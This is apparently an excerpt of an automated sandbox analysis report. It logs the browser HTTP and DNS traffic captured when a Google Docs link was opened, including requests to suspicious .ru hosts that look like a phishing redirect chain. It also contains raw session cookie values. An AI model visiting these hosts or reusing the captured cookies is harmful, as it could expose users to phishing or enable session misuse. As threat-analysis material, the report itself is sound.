CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lbcs=0; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /rand@a8huj HTTP/1.1Host: 3iff5.biijvi.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://2ya.leyapham.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://2ya.leyapham.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=card/exm=client,gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_2 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=config/exm=card,client,gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_3 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /static/document/client/js/94279402-client_js_prod_emojidata.js HTTP/1.1Host: docs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: lbcs=0; NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=config/exm=card,client,gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_3 HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=card/exm=client,gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_2 HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /rand@a8huj HTTP/1.1Host: 3iff5.biijvi.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /js/api.js HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://contacts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0?le=scs HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://contacts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /js/api.js HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.uiLLJjqnhCQ.O/m=gapi_iframes/rt=j/sv=1/d=1/ed=1/rs=AHpOoo8NP2y291iiPDmfAN0GV3dvCuqlYA/cb=gapi.loaded_0?le=scs HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=OgIM4HHPrLrBDqipFP_BZokg-aBSIVROpJUS2l_cW15yCWq6GPzCSs82eX55hhzH0LlqVbSOABLDEN867vtKh0GLSBQmGA47xWkIsQ3VqWpMLRD-rIKuklhK7QPlFE6hKfTzB4K9fva19ZG10oFpLUdYLRJpG-Dfl4Mh0Rd1VNFB91xBp3SuHuiXfpnv1L8jImNovhnZ
              Source: chromecache_248.2.drString found in binary or memory: Q4r.prototype.xFb=function(){this.J.Bq(this.H,this.F||void 0)};function R4r(){K4r.call(this,"fb","Facebook","Share via Facebook","ess-facebook-icon")}Em(R4r,K4r);R4r.prototype.getUrl=function(a){var c=cp(a,function(e){return e.Xb()});a=cp(a,function(e){return e.getUrl()});return"http://www.facebook.com/share.php?u="+ns(a.join(","))+"&t="+ns(c.join(","))};function S4r(){K4r.call(this,"gm","Gmail","Share via Gmail","ess-gmail-icon")}H(S4r,K4r);S4r.prototype.getUrl=function(a){a=cp(a,function(c){return c.Xb()+zN+c.getUrl()});return"https://mail.google.com/mail/?view=cm&ui=2&cmid=0&fs=1&tf=1&body="+ns(a.join("\n"))};function T4r(){K4r.call(this,"tw","Twitter","Share via Twitter","ess-twitter-icon")}H(T4r,K4r);T4r.prototype.getUrl=function(a){for(var c=[],e=0,f=0;f<a.length;f++){var g=a[f].getUrl(),h=e+g.length+(e?1:0);if(h>140)break;else c.push(g),e=h}for(f=0;f<a.length;f++){g=a[f].Xb();h=c[f]?zN:"";var k=140-e-h.length;if(k<g.length)if(k>=4)g=g.substring(0,k-3)+"\u2026";else break;e+=g.length+h.length;c[f]=g+h+(c[f]?c[f]:"")}a=c.join(" ");return"https://twitter.com/intent/tweet?text="+ns(a)};function U4r(a,c,e,f,g,h,k,l,p,q,u,w,y){p=p===void 0?new B4r:p;q=q===void 0?new B4r:q;u=u===void 0?new C4r:u;w=w===void 0?fBl:w;y=y===void 0?new rJ:y;rU.call(this);this.Oa=a||"";this.Mc=c;this.xc=e;this.hc=f;this.Nc=g;this.fd=h;this.wd=k;this.Ub=w;this.D=new pNn(l);this.Ra=new N4r([new S4r,new R4r,new T4r]);this.Ya(this.Ra);this.W=new JV(null,this.Ma());this.Ya(this.W);this.V=new JV(null,this.Ma());this.Ya(this.V);this.J=new uX(this.Ma());this.Ya(this.J);this.F=new nti(null,void 0,this.Ma());this.Ya(this.F); equals www.facebook.com (Facebook)
              Source: chromecache_248.2.drString found in binary or memory: Q4r.prototype.xFb=function(){this.J.Bq(this.H,this.F||void 0)};function R4r(){K4r.call(this,"fb","Facebook","Share via Facebook","ess-facebook-icon")}Em(R4r,K4r);R4r.prototype.getUrl=function(a){var c=cp(a,function(e){return e.Xb()});a=cp(a,function(e){return e.getUrl()});return"http://www.facebook.com/share.php?u="+ns(a.join(","))+"&t="+ns(c.join(","))};function S4r(){K4r.call(this,"gm","Gmail","Share via Gmail","ess-gmail-icon")}H(S4r,K4r);S4r.prototype.getUrl=function(a){a=cp(a,function(c){return c.Xb()+zN+c.getUrl()});return"https://mail.google.com/mail/?view=cm&ui=2&cmid=0&fs=1&tf=1&body="+ns(a.join("\n"))};function T4r(){K4r.call(this,"tw","Twitter","Share via Twitter","ess-twitter-icon")}H(T4r,K4r);T4r.prototype.getUrl=function(a){for(var c=[],e=0,f=0;f<a.length;f++){var g=a[f].getUrl(),h=e+g.length+(e?1:0);if(h>140)break;else c.push(g),e=h}for(f=0;f<a.length;f++){g=a[f].Xb();h=c[f]?zN:"";var k=140-e-h.length;if(k<g.length)if(k>=4)g=g.substring(0,k-3)+"\u2026";else break;e+=g.length+h.length;c[f]=g+h+(c[f]?c[f]:"")}a=c.join(" ");return"https://twitter.com/intent/tweet?text="+ns(a)};function U4r(a,c,e,f,g,h,k,l,p,q,u,w,y){p=p===void 0?new B4r:p;q=q===void 0?new B4r:q;u=u===void 0?new C4r:u;w=w===void 0?fBl:w;y=y===void 0?new rJ:y;rU.call(this);this.Oa=a||"";this.Mc=c;this.xc=e;this.hc=f;this.Nc=g;this.fd=h;this.wd=k;this.Ub=w;this.D=new pNn(l);this.Ra=new N4r([new S4r,new R4r,new T4r]);this.Ya(this.Ra);this.W=new JV(null,this.Ma());this.Ya(this.W);this.V=new JV(null,this.Ma());this.Ya(this.V);this.J=new uX(this.Ma());this.Ya(this.J);this.F=new nti(null,void 0,this.Ma());this.Ya(this.F); equals www.twitter.com (Twitter)
              Source: chromecache_323.2.drString found in binary or memory: function Hmh(a,c,e,f,g,h,k,l,p){h=ko(h,Gmh)?h:0;p=p?p:new jy;var q=Vp(p,iy,18)?R(p,iy,18):new iy;xJb(q,Dmh[a]);Rq(q,6,Emh[h]);Jq(q,16,f);Jq(q,17,g);!c||q2g(p,c);e&&(Kq(q,8,e.F),a=e.D,a!=null&&q.ZD(ju(a)));k&&(Rq(q,18,Fmh[k.F]),!k.H||Qq(q,19,k.H));l!=null&&l!==1&&Rq(q,20,l);KJb(p,q);return zD((new VC).Pb(9),p).oa()}function Imh(a,c,e){this.F=a;this.D=c;this.H=e}H(Imh,K);function Jmh(a,c){this.F=a;this.D=c}H(Jmh,K);function Kmh(){c7c();return"https://www.youtube.com/watch?v="}var Lmh,Mmh; equals www.youtube.com (Youtube)
              Source: chromecache_323.2.drString found in binary or memory: function fLi(a,c){gLi(a);var e=new bLi(c);c==5?a.Wv.callback(e):(a.D.onload=r(),a.D.onerror=r(),Ms(a.D),a.J>=3?a.Wv.callback(e):eLi(a))}function gLi(a){clearTimeout(a.F);a.F=null;clearTimeout(a.H);a.H=null}cLi.prototype.getStatus=function(){return this.Wv&&this.Wv.Ki()?this.Wv.getValue():new bLi(1)};var hLi=lm(["https://www.youtube.com/iframe_api"]),iLi=lm(["https://youtube.googleapis.com/iframe_api"]);function jLi(a,c){a=a===void 0?this.R:a;c=c===void 0?this.W:c;this.J=a;this.V=c;if(tm._docs_yt_api_preloaded){var e;b:{a=this.V();c=jm(kLi);for(var f=c.next();!f.done;f=c.next())if(f=f.value,a===f.toString()){a=f;break b}a=null}a=(e=a)!=null?e:lLi}else a=lLi;this.O=a;this.F=this.J(this.O);(e=Cs(DNg))&&Ms(e);this.D=tm._docs_yt_api_preloaded?2:0;this.H=[]} equals www.youtube.com (Youtube)
              Source: chromecache_330.2.drString found in binary or memory: inline:{css:1},disableRealtimeCallback:!1,drive_share:{skipInitCommand:!0},csi:{rate:.01},client:{cors:!1},signInDeprecation:{rate:0},include_granted_scopes:!0,llang:"en",iframes:{youtube:{params:{location:["search","hash"]},url:":socialhost:/:session_prefix:_/widget/render/youtube?usegapi=1",methods:["scroll","openwindow"]},ytsubscribe:{url:"https://www.youtube.com/subscribe_embed?usegapi=1"},plus_circle:{params:{url:""},url:":socialhost:/:session_prefix::se:_/widget/plus/circle?usegapi=1"}, equals www.youtube.com (Youtube)
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: vf=x(["https://sandbox.google.com/tools/feedback/"]),wf=x(["https://www.google.cn/tools/feedback/"]),xf=x(["https://help.youtube.com/tools/feedback/"]),yf=x(["https://asx-frontend-staging.corp.google.com/inapp/"]),zf=x(["https://asx-frontend-staging.corp.google.com/tools/feedback/"]),Af=x(["https://localhost.corp.google.com/inapp/"]),Bf=x(["https://localhost.proxy.googlers.com/inapp/"]),Cf=R(df),Df=[R(ef),R(ff)],Ef=[R(gf),R(hf),R(jf),R(kf),R(lf),R(mf),R(nf),R(of),R(pf),R(qf)],Ff=[R(rf),R(sf)],Gf= equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: docs.google.com
              Source: global trafficDNS traffic detected: DNS query: apis.google.com
              Source: global trafficDNS traffic detected: DNS query: play.google.com
              Source: global trafficDNS traffic detected: DNS query: 0.docs.google.com
              Source: global trafficDNS traffic detected: DNS query: peoplestack-pa.clients6.google.com
              Source: global trafficDNS traffic detected: DNS query: appsgenaiserver-pa.clients6.google.com
              Source: global trafficDNS traffic detected: DNS query: 2ya.leyapham.ru
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
